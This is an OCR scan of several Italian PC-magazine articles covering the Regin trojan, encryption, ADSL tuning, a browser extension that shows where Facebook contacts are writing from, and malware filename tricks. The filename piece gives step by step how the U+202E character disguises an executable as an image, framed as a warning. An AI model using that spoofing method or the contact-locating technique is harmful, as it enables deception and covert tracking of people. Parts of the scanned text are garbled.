a inoltrarli altrove. Regin potrebbe essere 
addirittura in grado di spiare computer privi 
di collegamento Internet. Per attuare ciò il 
trojan provvede anzitutto a memorizzare i dati 
sottratti sull’hard disk del PC infetto. Basterà 
collegarsi con un altro computer, ad esempio 
quell'amministratore di rete, affinché il virus 
provveda a copiare fulmineamente tutti i dati. 
Collegandosi con quest'ultimo computer via 


Internet, le informazioni trafugate entreranno 
in possesso dei malfattori. 

Vittime e autori del trojan 

Fino ad oggi sono state scoperte alcune cen¬ 
tinaia di attacchi informatici. Marco Preuss 
di Kaspersky è riuscito a rintracciare bersagli 
rilevanti in Russia e in Medio Oriente (vedi 
grafico, nella pagina seguente), ma Regin sta 
purtroppo perpetrando i suoi reati anche in 
paesi europei. Il quotidiano austriaco "Stan¬ 
dard" ha riferito che anche l’International 
Atomic Energy Agency a Vienna (IAEA), che 
partecipa ai colloqui tra Iran e i paesi occiden¬ 
tali, fa parte delle vittime. Quasi la metà delle 
infezioni accertate di Regin può avere colpito 
privati o piccole aziende. Marco Preuss ritiene 
che anche la Germania rientri tra gli obiettivi. 
È certo che dietro Regin non si nascondono 
criminali da strapazzo o hacker genialoidi, 
che hanno programmato il virus in piena au¬ 
tonomia. Lo sviluppo di questo trojan deve 
avere richiesto enormi risorse finanziarie e 
un lavoro di anni. La complessità del virus e 
la modalità di funzionamento di Regin porta 
la maggior parte degli esperti a concludere 
che lì sotto si nasconda un potente servizio 
segreto. La frequenza degli attacchi riscontrata 
in Medio Oriente potrebbe fare pensare ad un 
organismo occidentale. Sospettati principali 
sono l’NSA americano e il GCHQ britannico. 
Se ci chiediamo se Regin potrà difenderci dal 
terrorismo, la risposta è no, perché è concepito 
per un controllo permanente sul lungo perio¬ 
do. Gli obiettivi sono principalmente industrie 
e scienziati di paesi europei e asiatici. Si può 
infatti affermare che il supertrojan indaga su 
segreti industriali (Kutsal Berle di F-Secure è 
certo che "si tratta soprattutto di spionaggio"). 
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Centro sicurezza 


IL TROJAN CHE INFETTA I COMPUTER DI TUTTO IL MONDO 



Indonesia 


Kiribati 


Malaysia 


Gli esperti della sicurezza Kaspersky hanno scoperto attacchi informatici da parte di Regin soprattutto in Medio Oriente, 
Russia e Asia. Si insinua il sospetto che dietro vi siano i servizi segreti di paesi occidentali. Ecco la mappa della sua diffusione. 


Le soluzioni software per 
bloccare il malware 

A questo punto viene da chiedersi se è possi¬ 
bile stanare il trojan su un computer. Diciamo 


subito che le suite antivirus classiche di Ka¬ 
spersky, Symantec e G Data Internet Securi- 
ty sono in grado di riconoscere, in "Trojan. 
Win32.Regin.gen" o "Rootkit.Win32.Regin", 


almeno alcuni segmenti di Regin. Sarà be¬ 
ne però non sentirsi troppo sicuri, dato che 
possono senz’altro esistere altre funzioni e 
varianti di questo malware. 


Scoviamo la talpa di stato nel PC 

Per verificare se nel nostro computer sono presenti programmi di spionaggio possiamo ricorrere a Detect, una 
suite di protezione consigliata anche da organismi come Amnesty International. Ecco come usarlo. 


ita 

■ 

Laboratorio 



Disconnetti 

DirezioneEDM 



^ Disconnettiamo il PC 
da Internet 

Prima di awiare Detekt disattiviamo tutti i col- 
legamenti Internet. Basterà staccare il cavo Ethernet 
o rendere inattive tutte le connessioni WLAN. Per evi¬ 
tare errati avvisi di segnalazione, disattiviamo tempo¬ 
raneamente anche il nostro antivirus. 



^ Meglio se in italiano 

installiamo Detekt (lo trovi nel DVD allegato 
all rivista. Il tool non funziona con Windows 
8.1 a 64 Bit). Quando compare l'interfaccia clic- 
chiamo col tasto destro su Collegamento, selezio¬ 
niamo Esegui come amministratore e poi Si. Sce¬ 
gliamo Italian. 



-x Eseguiamo la scansione 

Cliccando su Scan Detekt esplorerà il PC 
alla ricerca di trojan di stato. Nel caso in cui 
segnali Pericolo, vuol dire che è stato scoperto qual¬ 
cosa di sospetto: sospendiamo l’uso del PC, finché 
il virus non sarà stato rimosso (magari richiedendo 
l'intervento di un esperto). 
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O Così fa Thacker 


Da sapere in 60 secondi | Criptazione | 


Quello che devi sapere sui 


metodi di 


CRIPTAZIONE 


Chiunque desideri rendere inaccessibili ai servizi segreti e affini le proprie 
e-mail o le fotografie dovrà criptarle tramite uno dei tanti metodi disponibili 


LA CRIPTAZIONb 
NEI SECOLI 


ANTICHITÀ: 2.500 anni fa i Greci avvolgevano attorno ad un 
bastone di legno i messaggi segreti, scritti su una pergamena 
(Skytale/ Scitala, vedi illustrazione a sinistra). Solo chi era in possesso 
di un bastone di ugual diametro era in grado di interpretare il testo. 

ANTICA ROMA: Giulio Cesare era solito scambiare le lettere dei propri testi 
con il terzo carattere successivo dell'alfabeto. Ad esempio, dalla parola CAESAR 
sarebbero risultate le seguenti lettere in successione: FDHVDU. Questo metodo 
1 era però abbastanza semplice da decifrare. 

; MEDIOEVO: Nel periodo del Rinascimento il matematico Leon Alberti inveir 
| un disco per le criptazioni che funzionava tramite anelli scorrevoli sui qua 
« erano riportate delle lettere. 

ì SECONDA GUERRA MONDIALE: Tramite \a Se ‘ il] 

« macchina per crittografia Enigma (vedi foto), ■ Q : 1 _ k 

I le forze armate tedesche cifravano i loro 
j messaggi radio. Solo dopo aver trafugato : " 

f una di queste macchine Enigma nel 1941 gli R» v 'Vi*** ‘ 

: Alleati riuscirono a capire il funzionamento \ \\ 

: del sistema a rulli che questo congegno : '' ' 

I nascondeva. 


I __«CT : 


COME FUNZIONA 
LA CRIPTAZIONE? 


LE DOMANDE RICORRENTI 

1 COSA POSSO CRIPTARE? Oltre alle e-mail, tutto il materiale 
digitale presente sul PC: documenti, foto, video e affini, singole 
partizioni e l'hard disk completo (per esempio, utilizzandoTrueCrypt). 
Le password e i dati di accesso per gli shop on-line e affini possono 
essere protetti ricorrendo a software appositi. 

2 COSA NON POSSO CRIPTARE? I cittadini comuni non 
hanno la possibilità di criptare le conversazioni telefoniche 
che transitano su rete fissa o via Internet, per renderle non 
intercettabili. La criptazione è possibile solo attraverso cellulari 
speciali (del costo di circa 2.500 Euro), ma affinché il sistema 
funzioni ne devono essere in possesso tutti gli interlocutori. 

3 QUANTO È SICURA LA "CRIPTAZIONE AES-256"? Molti 
programmi si affidano allo Advanced Encryption Standard, che 
provvede a suddividere i dati in numerosi piccoli blocchi e a mischiarli. 
Con la chiave di maggior lunghezza (256 bit) il metodo si rivela 
inattaccabile, poiché anche i supercomputer necessiterebbero di un 
tempo infinitamente lungo per la decriptazione (vedi grafico sotto). 

QUANTO È SICURA LA CRITTOGRAFIA AES 

QUANTO TEMPO IMPIEGA 
UN SUPERCOMPUTER* PER 
DECODIFICARE LE DIVERSE VARIANTI 
DEI METODI DI CRIPTAZIONE 

infinitamente lungo 
13,75 miliardi di anni 
399 secondi 

♦Supercomputer da ca. IO Petaflop 



Gli attuali metodi di criptazione si basano su complicate formule matematiche. Vengono 
utilizzati due sistemi: 

1 Simmetrico: Si utilizza la stessa chiave sia per la criptazione che per la decriptazione, che 
deve essere conosciuta da coloro che vogliono accedere ai dati cifrati. È naturalmente 
importantissimo mantenerla segreta. Questo metodo è adatto per elevati quantitativi di dati. 

2 Asimmetrico: Questo metodo è popolare soprattutto per la criptazione di e-mail. Il principio 
di base è il seguente: il mittente, per cifrare il messaggio, sfrutta la "chiave pubblica" del 
destinatario. Per renderlo nuovamente leggibile il destinatario utilizzerà la chiave "privata", di 
cui solo lui è a conoscenza. 

IN CIFRE 

• Le chiavi sicure devono essere composte da almeno OTTO CARATTERI comprensivi di lettere maiuscole 
e minuscole, cifre e caratteri particolari; 

• La connessione mobile WLAN WPA2 sfrutta lo standard di criptazione AES; 




DA SAPERE 

PUNTI DEBOLI 
DEL SISTEMA 

La criptazione AES è a prova di bomba, ma il punto debole 
di questo sistema riguarda la a password. Che cosa accade 
quando viene smarrita? Come è possibile conservarla in 
modo sicuro, al cento per cento, senza essere costretti a 
criptarla di nuovo? Va da sé che le password importanti 
possono essere conservate nel migliore dei modi 
\ riponendole scritte su un pezzo di carta, nella J 
buona, vecchia cassaforte oppure nella f 

cassetta di sicurezza di una 
banca. 
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Una risposta a tutto 


Così fa l'hacker C* 


Geolocalizza i tuoi amici! 

•J Esiste un modo per scoprire da dove mi sta scrivendo 

un mio contatto sul social network? 

•/ Qual è la procedura per disattivare la localizzazione 

degli utenti su Facebook? 


permette, tramite una piccola estensione per 
il browser, di vedere gli spostamenti dei nostri 
amici e capire il posto esatto dal quale ci stanno 
scrivendo. Questa estensione, naturalmente, 
non va a leggere dati privati degli utenti ma, 
semplicemente, estrapola la posizione tramite 
i dati messi a disposizione proprio da Facebook 
tramite l'attivazione di questa funzione nel pro¬ 
prio profilo. Vediamo insieme come installare e 
utilizzare questa estensione su Google Chrome. 

STOP ALLA LOCALIZZAZIONE SU FACEBOOK 

Come abbiamo visto, se il servizio di posizione di Messen¬ 
ger è attivo tutti possono riuscire a vedere la nostra posi¬ 
zione tramite un semplice plug-in. Come facciamo quindi 
a disattivare questa opzione? Apriamo l'applicazione 
di Facebook sul nostro smartphone e, all'interno delle 
Impostazioni, selezioniamo Impostazioni Applicazione. 
Ora andiamo su 5erv/z/sulla posizione di Messenger e 
verifichiamo che la localizzazione sia deselezionata. Se il 
servizio è attivo togliamo il segno di spunta dal Location 
ison in modo da disattivare in modo definitivo la nostra 
posizione. 

Così individuiamo la posizione geografica di un contatto Facebook 


1 Apriamo con Google Chrome e visitiamo il 
Web Store raggiungendo l'indirizzo www. 
winmagazine.it/link/3155. Cerchiamo Marau- 
ders Map e installiamo l'estensione cliccando sul 
tastoAGGIUNGI. Terminata l'installazione, siamo 
pronti ad utilizzare la nostra nuova estensione. 



U 


2 A questo punto apriamo la pagina dei Mes¬ 
saggi di Facebook all'indirizzo Internet 
https://www.facebook.com/messages ed ef¬ 
fettuiamo il login utilizzando il nostro account. 
Fatto, ciò, procediamo selezionando una delle 
chat sulla sinistra. 


f- 



3 In basso a sinistra nella pagina apparirà un 
piccolo pop-up individuato dalla scritta 
Marauders Map. Sarà sufficiente fare clic su 
di esso per aprire la mappa che automatica- 
mente indicherà la posizione del nostro con¬ 
tatto Facebook. 



SERVE A CHI... 

... desidera determinare la posizione 
geografica esatta dei propri contatti 
su Facebook 


C on 800 milioni di utenti unici al mese e 72 
milioni di contenuti condivisi ogni giorno 
Facebook è il social network numero uno al 
mondo. Basti pensare che ad esso è iscritto 
quasi il 50% della popolazione mondiale. Dal 
2004, anno della sua fondazione, ne è stata 
fatta di strada e sono stati introdotti numerosi 
aggiornamenti e restyling. Uno di questi riguar¬ 
da proprio l'introduzione dell'app Facebook 
Messenger che ha di fatto separato il servizio 
di messaggistica immediata dallo stesso social 
network, obbligando gli utenti a installare l'ap¬ 
plicazione sui propri smartphone. Facebook 
Messenger permette infatti di raggiungere 


istantaneamente le persone che conosciamo 
inviando loro messaggi, proprio come se stessi¬ 
mo spedendo un SMS ma in maniera del tutto 
gratuita. Inoltre ci consente di condividere 
con gli amici sui telefonini immagini e video in 
maniera semplice e veloce. Tra le funzioni più 
interessanti introdotte proprio con Messenger 
c'è poi la possibilità di effettuare chiamate con 
i nostri amici di Facebook utilizzando una con¬ 
nessione dati, molto utile specialmente se ci 
troviamo all'estero e abbiamo a disposizione 
una connessione Wi-Fi. 

Dove sono i miei amici? 

Una delle impostazioni di Messenger e di Fa¬ 
cebook stesso riguarda la condivisione della 
nostra posizione con gli altri utenti nel mo¬ 
mento in cui utilizziamo un servizio collegato 
al nostro account. Facebook incoraggia ad 
utilizzare questa funzione tanto che di default 
è sempre attiva su tutti i nostri account. Ciò ci 


Speciali Win Magazine 33 
















Virus: basta un doppio clic! 



Centro sicurezza 
Win Magazine 



Tì infetto il PC 
con un clic! 

Di default Windows non visualizza le 
estensioni dei file noti. Così i creatori di 
malware ne approfittano per infettare i PC 


I l modo più semplice per infettare il pro¬ 
prio computer è quello di mandare in 
esecuzione un file contenente al pro¬ 
prio interno il codice di un virus o di uno 
spyware. Un doppio clic di troppo sul file 
sbagliato può infatti scatenare l'inferno nel 
nostro PC con conseguenze che, in taluni 
casi, possono essere anche abbastanza 
gravi, come la cancellazione definitiva di 
documenti importanti presenti sul disco 
rigido, il furto di password e dati personali 
evia dicendo. 


Attenti all’estensione dei 
file salvati su disco 

Per individuare la tipologia di un file ti¬ 
picamente basta osservarne l’estensione, 
ovvero il suffisso costituito da una breve 
sequenza di caratteri (generalmente tre) 
che ne segue il nome ed è separato da 
quest'ultimo da un punto. L’estensione 
del file indica al sistema operativo di che 
tipo di file si tratta e con quale programma 
associato deve aprirlo. Ad esempio prova, 
jpg è un'immagine digitale perché l’esten¬ 


sione JPG indica appunto che appartiene 
a questa categoria di file e, cuccandoci 
due volte sopra, Windows la apre col vi¬ 
sualizzatore predefinito. Quelli invece che 
hanno estensione .com o .exe (ad esempio 
setup.exe) sono veri e propri eseguibili. La 
maggior parte di essi non contiene virus, 
ma quando li scarichiamo dai siti Inter¬ 
net o li riceviamo come allegati ai nostri 
messaggi di posta elettronica dobbiamo 
stare molto attenti a non fare doppio clic 
su di essi, in particolare se sono di origine 
sconosciuta oppure se il mittente non ci ha 
preventivamente informato del loro con¬ 
tenuto. Se il PC di un nostro amico è stato 
infettato, infatti, il nostro indirizzo e-mail è 
stato inserito nella sua rubrica, potremmo 
ricevere a sua insaputa un messaggio di 
posta con in allegato un eseguibile che 
in realtà è un virus. Per questo motivo 
quando riceviamo come allegati dei file 
di questo genere è opportuno eliminare 
direttamente l’e-mail oppure, in extremis, 
salvarli in una cartella a parte su hard 
disk ed effettuarne una scansione con un 
antivirus aggiornato prima di eseguirli 
(in alternativa possiamo effettuare una 
scansione on-line con il pratico servizio 
VirusTotal). 

Il trucco per infettare 
il PC c’è, ma non si vede 

Il creatori di virus non sono sicuramente 
degli sprovveduti e, puntando sulle abitu¬ 
dini e la disattenzione degli utenti, esco¬ 
gitano sempre nuovi trucchi per riuscire 
comunque a infettare i loro PC. 

Uno di questi si basa sulla visualizzazione 
delle estensioni dei file che di default, al- 



Se la visualizzazione delle estensioni è disattivata, potremmo ritrovarci sul nostro computer con un file 
camuffato da malware. 
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Virus: basta un doppio clic! 


Così fa l'hacker 


Attiviamo la visualizzazione delle estensioni dei file 





I Se la visualizzazione dell'estensione dei 
file è disattivata in Windows, possiamo 
visualizzarne solo il nome. Per ovviare a 
ciò, direttamente in Esplora risorse andia¬ 
mo nel menu Strumenti e selezioniamo la 
voce Opzioni cartella. 


2 Quando compare la scheda Opzioni car¬ 
tella, andiamo nel tab Visualizzazione e, 
nel riquadro Impostazioni avanzate, toglia¬ 
mo il segno di spunta dalla voce Nascondi 
le estensioni per i tipi di file conosciuti. Pre- 
miamo App//ca, quindi OK. 


3 Una volta fatto ciò, potremo immedia¬ 
tamente visualizzare tutti i file con le 
loro relative estensioni. Se un allegato ha 
un'estensione fasulla, adesso riusciremo a 
vedere quella vera all'estrema destra del 
suo nome. 


meno per quelle più comuni (come EXE, 
MP3, JPG, BMP, AVI e via dicendo), è di¬ 
sabilitata in tutte le versioni di Windows. 
Approfittando proprio di questa caratte¬ 
ristica degli OS Microsoft, molti malware 
riescono a nascondere la loro vera esten¬ 
sione e a far credere all’utente di essere 
file innocui. Il semplice stratagemma ar¬ 
chitettato dai malintenzionati consiste 
nell'utilizzare file con due estensioni in 
modo tale che allegati pericolosi vengano 
ritenuti sicuri. Il file Traccial.mp3.exe 
verrà visualizzato come Tracciai.mp3 e 
noi saremo tentati di aprirlo pensando che 
si tratti di un file audio. Solo osservando 
bene l’icona visualizzata a sinistra del file 
potremmo accorgerci che non si tratta di 
un brano musicale, ma di un eseguibile. 
Qualora cadessimo nel tranello, Win¬ 
dows tenterebbe di aprire il file basan¬ 
dosi sull'estensione che trova all’estrema 
destra del nome del file: nel nostro caso 
il file Traccial.mp3.exe (visualizzato in 
Risorse del computer come Tracciai .mp3) 
verrebbe avviato come un eseguibile e non 
aperto con un player multimediale come 
invece ci aspetteremmo. 

Come possiamo evitare di cadere distrat¬ 
tamente nella trappola? Semplice, basta 
abilitare la visualizzazione delle esten¬ 
sioni dei file: in tal modo ai nostri occhi 
comparirà sia l'estensione fake del file 
sia quella vera e non potremo più farci 
trarre inganno! 


IL TRUCCO DELL'ESTENSIONE "ROVESCIATA" 


Un'altra tecnica efficace che 
gli sviluppatori di virus utiliz¬ 
zano per infettare i computer 
è quella che si basa sulla visua¬ 
lizzazione in Windows dei testi 
in lingue sinistrorse (arabo, 
ebraico, ecc), scritte cioè an¬ 
dando da destra verso sinistra, 
al contrario dell'italiano e delle 
altre lingue occidentali che 
invece sono destrorse, cioè 


no Invio. Aperta la Mappa 
caratteri, individuano il ca¬ 
rattere U+202E e lo copiano 
negli appunti premendo pri¬ 
ma Seleziona e poi Copia. A 
questo punto prendono gli 
sviluppatori prendono l'ese¬ 
guibile del loro malware e lo 
rinominano, ad esempio"Foto 
in spiaggia gpj.exe". Fatto ciò 
posizionano il cursore appena 


prima di gpj.exe e, utilizzando 
la combinazione di tasti Con¬ 
trol + V incollano il carattere 
U+202E memorizzato negli 
appunti. In un batter d'occhio 
il nome del file diventerà"Foto 
in spiaggia exe.jpg", facendo 
credere all'utente che si tratta 
di un'immagine digitale men¬ 
tre è un'eseguibile. Teniamo 
pertanto gli occhi ben aperti! 


scritte da sinistra verso destra. 
Per gestire le lingue sinistrorse 
esiste un carattere speciale nel 
sistema Unicode, identificato 
dal codice U+202E (possiamo 
trovarlo utilizzando la Mappa 
caratteri di Windows), che per¬ 
mette di invertire una stringa 
di testo. Si tratta di un simbolo 
di formattazione invisibile che 
forza la scrittura da destra a 
sinistra. In pratica il carattere 
U+202E viene usato per ingan¬ 
nare gli utenti sull'identità del 
file, anche quando la visualiz¬ 
zazione delle estensioni dei 
file conosciuti è stata abili¬ 
tata. Come fanno? In pratica 
vanno nel menu Start/Esegui, 
digitano charmap e premo- 


Mappa caratteri 
Tipo di carattere: 0 Anal 
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Caratteri da copare: | 
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O Così fa Thacker 


Fai da te I Metti il turbo a Internet 


Naviga in Rete 
a tutto gas 

Ecco come configurare e ottimizzare l’ADSL di casa 
per sfrecciare su Internet 


Cosa ci 

occorre V™ L f/ 

ACCELERATORE 

INTERNET 

CFOSSPEED 

Lo trovi su: 3?DVD 
Quanto costa: € 15,90 
Sito Internet: 

www.cfos.de 
Note La versione di 
cFosSpeed che trovi 
sul CD/DVD è completa 
per 30 giorni. 


D a quando Internet è entrata nelle case 
di tutti con un crescente fabbisogno 
di larghezza di banda da parte di ap¬ 
plicazioni Web e giochi, le problematiche 
legate alla latenza della connessione si sono 
moltiplicate. Quanti di noi si sono ritrovati 
a non riuscire a navigare quando è in corso 
il caricamento di un video su YouTube? E 
quanti lamentano di non riuscire a giocare 
con il loro multiplayer preferito mentre un 
altro utente della rete domestica sincronizza 
i suoi file con Dropbox? Sicuramente in molti, 
e anche negli ambienti lavorativi il proble¬ 
ma della disponibilità di banda è diventato 


sempre più urgente a causa del collega che 
tiene eMule acceso sul suo portatile per tutto 
il giorno o di quello che ha la mania di fare 
frequenti backup sul cloud. 

Perché Internet rallenta? 

Una delle cause principali della latenza di 
trasmissione della propria connessione è 
determinata dalla saturazione della banda 
di upload alla quale le configurazioni tradi¬ 
zionali di router e PC non pongono soluzioni. 
Alcuni pensano che il principale responsabile 
del rallentamento della linea quando ope¬ 
riamo un upload "importante" sia un limite 


intrinseco alla tecnologia dell’ADSL, ma la 
realtà è un'altra. Il rallentamento se non il 
blocco totale dei dati in ingresso durante un 
caricamento in uscita è infatti responsabi¬ 
lità del protocollo TCP/IP e, nello specifico, 
dell'impossibilità da parte di quest’ultimo 
di inviare correttamente al server remoto 
il pacchetto ACK (Acknowledge), una sor¬ 
ta di conferma di avvenuta ricezione che 
consente a quest’ultimo di proseguire con 
l’invio dei pacchetti successivi. In altre pa¬ 
role, anche se siamo abituati a considerare 
lo scaricamento di un file come qualcosa che 
occupa solo la banda di download, in realtà 


J II tool che sblocca l’ADSL 

Scopriamo assieme la procedura corretta da seguire per installare e configurare cFosSpeed. Potremo così 
attivare immediatamente il controllo sulla latenza di banda della nostra connessione a Internet. 



^ Software pronto all’uso 

Nella sezione Internet del Win CD/DVD è 
presente l’archivio cFosSpeed.zip : scom¬ 
pattiamolo in una qualsiasi cartella deH’hard disk, ad 
esempio il Desktop , ed eseguiamo il file EXE con¬ 
tenuto al suo interno. Installiamo quindi il software 
mantenendo i dati richiesti sui loro valori standard. 



^ Abbassiamo la latenza 

Al termine clicchiamo due volte sull’icona 
di cFosSpeed nella System tray di Windows. 
Nella piccola finestra che si apre, clicchiamo sull’ico¬ 
na centrale facendo in modo che raffiguri una freccia 
verso l’alto: si tratta della modalità a bassa latenza 
che dà priorità al tempo di ping. 



Chi occupa la banda? 

Clicchiamo sull’Icona a sinistra della freccia. 

Si aprirà una finestra del browser con l’elen¬ 
co delle connessioni in atto: aumentiamo (cuccando 
+) o diminuiamo (cuccando -) la priorità da destina¬ 
re ad ogni singola connessione agevolando ulterior¬ 
mente l’ottimizzazione della connessione. 
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LA PICCOLA E POTENTE INTERFACCIA DI CFOSSPEED 

Il programma è semplicissimo da utilizzare: utilizzando correttamente i suoi potenti strumenti possiamo 
ottimizzare e velocizzare la connessione a Internet in pochi clic. 



D LAUNCH ICON 

Cuccando due volte su questa icona 
possiamo accedere a tutte le funzioni 
del software 

O MODALITÀ ALTA LATENZA 

Cucchiamo sulla freccia in alto per dare 
priorità alla larghezza di banda. Cuccando 
sulla freccia in basso, al contrario, 
impostiamo una bassa latenza che agevola 
il tempo di PING 

EJ CONNESSIONI 

Permette di accedere ad un menu 
contestuale che contiene tutte le 
connessioni attive 





27/1 


O BANDA UPLOAD 

È una rappresentazione grafica molto 
intuitiva che esprime quanta banda in 
upload è occupata dalle applicazioni in 
esecuzione nel sistema 


E1 BANDA DOWNLOAD 

Anche in questo caso, basta un'occhiata per 
sapere quanta banda stanno occupando, ad 
esempio, le applicazioni di file sharing 

IH TEMPO DI PING 

Viene espresso in millisecondi: se non 
supera i 50 ms vuol dire che la connessione 
ADSL funziona correttamente 

EJ CONNESSIONI CORRENTI 

Indica quante connessioni in ingresso e 
uscita sono attive in un preciso momento 

O VELOCITÀ UPLOAD 

Indica la velocità della nostra ADSL nel 
trasferimento on-line 

O VELOCITÀ DOWNLOAD 

Permette di conoscere in tempo reale la 
velocità di download delle applicazioni attive 
nel sistema 



MISURIAMO IL 
NOSTRO PING 

Per misurare il nostro 
tempo di ping inter¬ 
rompiamo ogni down- 
load/upload, avviamo 
il Prompt dei comandi 
(dal menu Start digi¬ 
tiamo cm</e dicchiamo 
Prompt dei comandi 
nei risultati). Digitiamo 
il comando pingwww. 
winmagazine.it. Se il 
valore medio restituito 
non è superiore ai 50 
ms, il fornitore di con¬ 
nettività ci sta offrendo 
un ottimo servizio. 


quest'operazione richiede dello "spazio" 
anche su quella di upload: una richiesta si¬ 
curamente poco esosa, in quanto si tratta di 
un semplice scambio di informazioni tra il 
Client e il server in cui il primo comunica al 
secondo "OK, puoi proseguire con il resto", 
ma pur sempre fondamentale. 

Misuriamo la latenza 

Il modo migliore per valutare la latenza della 


nostra trasmissione è verificare il tempo di 
ping, un valore che oscilla tra i 15 ms (ot¬ 
timale) e che nel caso di un intasamento 
importante può anche arrivare a 300 o 400 
millisecondi. Ping è un’utility di rete molto 
conosciuta dagli amministratori di server e 
usata per misurare il tempo che impiega un 
computer per inviare un piccolo pacchetto 
dati (32 byte) a un altro computer e poi rice¬ 
verlo. Naturalmente partiamo dall'assunto 


che il server con cui stiamo effettuando la 
misurazione non sia appesantito da cari¬ 
chi di lavoro importanti o particolarmente 
distante dalla nostra posizione. In una con¬ 
nessione dove il valore del ping è pari a 50 ms 
significa che quel pacchetto ha impiegato 50 
millisecondi per andare e tornare, un valore 
praticamente perfetto per qualsiasi attività 
on-line che richieda risposte veloci come i 
giochi multiplayer. 


Configurazione LAN avanzata 

Vediamo adesso come attivare differenti priorità di connessione per ogni singolo software o videogioco installato 
nel computer: otterremo così ottimi risultati nelle prestazioni della nostra linea ADSL. 



^ Gestiamo il traffico 

Calibriamo la linea ADSL cliccando col tasto 
destro sull’icona dì cFosSpeed e selezionan¬ 
do prima TRAFFIC SHAPING e poi CALIBRAZIONE 
DELLA LINEA (interrompiamo qualsiasi tipo di traffico 
sulla rete). Il software misurerà in 3 minuti la capacità 
massima di download e upload della linea. 



Diamo priorità ai giochi 

2 Sempre dal menu contestuale di cFosSpeed 
selezioniamo ora la voce OPZIONI. Cucchia¬ 
mo sulla scheda PROGRAMMI a sinistra e poi su 
GIOCHI in alto. Scegliamo il titolo (nell’Immagine Cali 
of Duty) col quale giochiamo più frequentemente e 
impostiamo il cursore a destra sulla voce ALTO. 



^ Blocchiamo i “mangia banda” 

Nella stessa schermata cucchiamo sulla 
scheda CONDIVISANE FILE e scegliamo 
dall’elenco che appare il programma che solitamen¬ 
te è responsabile dell’Intasamento della banda (ad 
esempio, Dropbox): assegniamogli una priorità bas¬ 
sa agendo di conseguenza col cursore sulla destra. 


► 
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Navighiamo più veloci! 


Terminata la configurazione di rete, effettuiamo un veloce test della nostra linea ADSL durante una sessione 
di upload, attivando e poi disattivando cFosSpeed: le differenze di velocità saranno notevoli! 



Effettuiamo un test 

Clicchiamo col tasto destro del mouse 
sull’icona di cFosSpeed e disabilitiamo il 
traffing shaping: dal menu contestuale selezioniamo 
la voce TRAFFIC SHAPING e clicchiamo su DISABI¬ 
LITA TRAFFING SHAPING. Awiamo quindi il browser 
e colleghiamoci al sito www.speedtest.net. 


Simuliamo un caso reale 

Avviamo, ad esempio, la riproduzione di un 
video su YouTube oppure carichiamo un 
documento su Google Drive. Nella finestra del brow¬ 
ser dove abbiamo aperto lo SpeedTest clicchiamo 
sul pulsante BEGIN TEST. Prendiamo quindi nota dei 
valori di Ping , Download e Upload. 


La differenza è notevole! 

Riabilitiamo il Traffic Shaping da cFos¬ 
Speed. Verifichiamo che l'upload preceden¬ 
te sia ancora in corso e clicchiamo di nuovo BEGIN 
TEST in SpeedTest. Il tempo di ping è dimezzato, 
mentre la banda per il download è aumentata, a 
testimonianza dell’awenuta ottimizzazione dell’ADSL! 


Sfruttiamo tutta la banda 

Per risolvere il problema della latenza, quin¬ 
di, bisogna permettere ai pacchetti ACK di 
partire senza problemi anche quando stiamo 
caricando un video su YouTube: in pratica 
questo significa porre dei limiti alle singole 
connessioni che, qualora non previste dal 
software (come nel caso di Dropbox), bisogna 


delegare a software specifici che effettuano 
un'operazione detta di "traffic shaping”, let¬ 
teralmente controllo del traffico. Abbiamo 
quindi scovato un software che, oltre a fun¬ 
zionare perfettamente, concorre a divenire 
uno standard per l’ottimizzazione delle con¬ 
nessioni dati in quanto viene adottato anche 
da produttori di schede madri del calibro di 


Asus, Gigabyte, AsRock ed MSI che lo integra¬ 
no nella dotazione standard dei loro modelli 
di punta. Si tratta di cFosSpeed, un software 
che, se correttamente configurato, consente 
di mettere il turbo alla nostra connessione 
ADSL con risultati in termini di taglio dei 
tempi di latenza davvero eccezionali. Provare 
per credere! 


UNA LAN EFFICIENTE CON LA MODALITÀ COOPERATIVA 


Se installiamo CFOS SPEED su tutti i compu¬ 
ter della rete potremo ottimizzare la nostra 
LAN in un batter d'occhio. Raggiungendo la 
finestra delle opzioni di cFosSpeed (come 
sempre, clicchiamo col tasto destro del 
mouse sull'icona del software nella System 
tray di Windows e selezioniamo la voce 
Opzioni) clicchiamo sull'icona dell'ingra¬ 
naggio che fa capo alla scheda di rete che 
utilizziamo per la navigazione. Nella finestra 
successiva togliamo la spunta alla voce Non 
cooperativa e attiviamo invece la voce Net 
Talk subito sotto. A seguire, impostiamo la 
tipologia di connessione ADSL dal menu 
a tendina tipo connessione: per le ADSL 
di casa, tipicamente, occorre selezionare 
la voce DSL (PPPoE). Così facendo avre¬ 
mo ottimizzato contemporaneamente la 
connessione a Internet su tutti i computer 
connessi alla retedi casa. Ricordiamo, però, 


che questo tipo di modalità è utile solo se 
tutti i computer presenti nella LAN installa¬ 
no cFosSpeed e attivano le impostazioni di 
cui sopra: purtroppo basterà un solo dispo¬ 
sitivo (come un tablet o uno smartphone) 


non sottomesso alle regole del software per 
vanificare lo strumento di ottimizzazione 
della LAN. In questo caso, occorre riattivare 
la modalità Non cooperativa per evitare di 
generare ulteriori rallentamenti dell'ADSL. 


1 1 Non* C t una macchina itrva (fot 

Truffi* hAp.ivj rtrIU I A.N 

IVI Mrf I Jfc Tratnwtwnnr drtlr tfarrtfwt» ithaffvn 


-.-4 tua LAN 

U Mèi la è tornir ««Ufkml bri Uva li«tl. 




ACCESS POINT 
FATTO IN CASA 


La versione a pagamen¬ 
to di cFosSpeed permet¬ 
te di usare il PC come 
Access Point Wi-Fi (se 
è presente una scheda 
Wi-Fi). Dall'apposita vo¬ 
ce nel menu possiamo 
configurare l'SSID della 
rete e definire una pass¬ 
word. I dati del Wi-Fi 
passeranno attraverso 
cFosSpeed che impedirà 
ai dispositivi connessi di 
saturare la banda. È uti¬ 
le se usiamo smartpho¬ 
ne, tablet o Smart TV 
sui quali non possiamo 
installare cFosSpeed. 
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MIGLIORIAMO LA VELOCITÀ DELLA NOSTRA RETE WI-FI 


Con piccole modifiche alla configurazione del router è possibile ottimizzare la connessione wireless per tutti 
i dispositivi connessi alla LAN domestica. 



PIÙ POTENZA 
PER L’ANTENNA 


Alcuni router, soprattutto quelli più eco¬ 
nomici, sono dotati di antenne con bassa 
efficienza di trasmissione che non riescono 
a diffondere correttamente il segnale Wi-Fi. 
C’è però un semplice trucco per risolvere 
il problema. 

Procuriamoci una lattina di alluminio di quelle 
usate per le bevande e posizioniamola intorno 
all’antenna dopo averla tagliata e leggermen¬ 
te aperta lungo l’asse verticale. In questo mo¬ 
do creiamo una sorta di amplificatore che per¬ 
mette di aumentare la potenza del segnale Wi- 
